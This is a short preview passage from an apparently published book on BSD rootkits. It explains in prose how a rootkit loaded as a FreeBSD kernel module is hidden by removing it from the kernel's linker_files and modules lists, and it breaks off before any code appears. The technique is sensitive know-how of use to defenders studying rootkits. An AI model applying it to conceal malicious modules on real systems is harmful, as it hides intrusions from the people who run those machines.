Hiding a KLD
To remedy this problem, we'll employ some DKOM to hide the rootkit, which is, technically, a KLD.
Recall from Chapter 1 that whenever you load a KLD into the kernel, you are actually loading a linker file that contains one or more kernel modules. As a result, whenever a KLD is loaded, it is stored on two different lists: linker_files
and modules
. As their names imply, linker_files
contains the set of loaded linker files, while modules
contains the set of loaded kernel modules.
As with the previous DKOM code, the KLD hiding routine will traverse both of these lists in a safe manner and remove the structure(s) of your choosing.
The linker_files List
The linker_files
list is defined in the file /sys/kern/kern_linker.c as follows:
static ...
Get Designing BSD Rootkits now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.